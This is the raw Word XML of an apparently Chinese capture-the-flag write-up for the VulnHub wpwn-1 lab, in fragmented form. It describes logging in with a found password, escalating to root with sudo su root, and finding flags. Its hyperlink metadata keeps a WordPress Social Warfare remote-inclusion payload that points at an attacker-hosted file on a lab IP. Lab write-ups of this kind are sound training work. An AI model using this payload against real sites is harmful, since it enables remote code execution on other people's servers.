        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DD78AF2" wp14:editId="3A7E3D65">
            <wp:extent cx="5274310" cy="1195705"/>
            <wp:effectExtent l="0" t="0" r="2540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A8F46" w14:textId="33A14929" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="4D807EF0" w14:textId="2D695C27" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点查看源代码返回正常，得到一串奇奇怪怪的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C60C4F9" w14:textId="3E011DA2" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="042AC886" wp14:editId="39858D00">
            <wp:extent cx="2540131" cy="1289116"/>
            <wp:effectExtent l="0" t="0" r="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131" cy="128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AA50B" w14:textId="13CAE654" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D"/>
    <w:p w14:paraId="69F2D5AB" w14:textId="78CB76E1" w:rsidR="00621868" w:rsidRDefault="00621868" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于手头上正常的用户</w:t>
      </w:r>
      <w:r w:rsidR="001C1B36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有两个，所以逐一尝试，最后takis正常登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745F4E5" w14:textId="309C980A" w:rsidR="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1485FEA5" wp14:editId="14C2BD56">
            <wp:extent cx="4153113" cy="164473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113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18CAE" w14:textId="6C806229" w:rsidR="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="0006000D"/>
    <w:p w14:paraId="1442C073" w14:textId="233FDC7B" w:rsidR="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功得到第一个f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA2E27" w14:textId="10776BF0" w:rsidR="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="0006000D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D3450FC" wp14:editId="6DA93C33">
            <wp:extent cx="2165461" cy="831893"/>
            <wp:effectExtent l="0" t="0" r="635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461" cy="83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48FF5" w14:textId="59E2C37B" w:rsidR="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="0006000D"/>
    <w:p w14:paraId="6B72339A" w14:textId="2E3143B6" w:rsidR="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="001C1B36">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x05:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FF6280" w14:textId="461CF375" w:rsidR="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="001C1B36">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这次s</w:t>
      </w:r>
      <w:r>
        <w:t>udo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有挂掉然后权限很高直接sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> su root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以无密码切换了，打开root</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以后还提示找找U</w:t>
      </w:r>
      <w:r>
        <w:t>SB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就用f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ind </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后找到以后cd得到真正的flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEFE815" w14:textId="4B5B540E" w:rsidR="001C1B36" w:rsidRPr="001C1B36" w:rsidRDefault="001C1B36" w:rsidP="001C1B3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9B48850" wp14:editId="3668CEBD">
            <wp:extent cx="5274310" cy="1784985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="57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1B36" w:rsidRPr="001C1B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FF9CA4" w14:textId="77777777" w:rsidR="00D6641E" w:rsidRDefault="00D6641E" w:rsidP="0006000D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04D1AC3E" w14:textId="77777777" w:rsidR="00D6641E" w:rsidRDefault="00D6641E" w:rsidP="000600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2E23C2" w14:textId="77777777" w:rsidR="00D6641E" w:rsidRDefault="00D6641E" w:rsidP="0006000D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1F3BA552" w14:textId="77777777" w:rsidR="00D6641E" w:rsidRDefault="00D6641E" w:rsidP="000600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E92"/>
    <w:rsid w:val="0006000D"/>
    <w:rsid w:val="001C1B36"/>
    <w:rsid w:val="002407C2"/>
    <w:rsid w:val="00404E92"/>
    <w:rsid w:val="00621868"/>
    <w:rsid w:val="007B1E02"/>
    <w:rsid w:val="00C06D2C"/>
    <w:rsid w:val="00D6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2AD9E8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{14F1BAD4-C7E4-440E-8A96-4A044EBBD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600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00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00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00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000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6000D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06000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600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192.168.19.135" TargetMode="External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192.168.19.135" TargetMode="External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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/entry/wpwn-1,537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hyperlink" Target="http://192.168.19.135/wordpress/wp-admin/admin-post.php?swp_debug=load_options&amp;swp_url=http://192.168.19.128/5.txt" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19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wangc</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>wangc</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-25T13:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-25T14:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>